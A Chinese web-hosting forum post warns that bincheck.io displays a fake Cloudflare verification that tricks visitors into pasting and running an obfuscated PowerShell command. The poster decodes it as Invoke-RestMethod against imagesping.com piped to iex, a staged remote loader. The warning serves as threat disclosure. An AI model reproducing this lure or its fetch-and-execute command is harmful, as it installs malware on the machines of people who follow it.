全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 616|回复: 0

定向投毒:bincheck.io 伪装验证码诱导执行 PowerShell 远程加载

[复制链接]
发表于 昨天 09:48 | 显示全部楼层 |阅读模式
近期在访问 BIN 查询站点 https://bincheck.io/zh 时,页面出现异常“Cloudflare 验证”,并提示执行以下操作:

Win + R
Ctrl + V
Enter
该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。

命令分析结果:

使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为:
Invoke-RestMethod imagesping.com
→ iex 执行返回内容

即从远程服务器下载脚本并直接执行。

进一步测试发现:

直接浏览器访问 imagesping.com 仅返回简单 JS 代码:

{if(nav.vendor==undefined){done(" not available ");};

说明该域名存在访问环境判断机制,仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
lQLPJxZdHgvsuNnNA2nNBUCwmvHyWslIto8JdjgtesdMAQ_1344_873.png (36.98 KB, 下载次数: 2)
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-2-26 19:15 , Processed in 0.065573 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表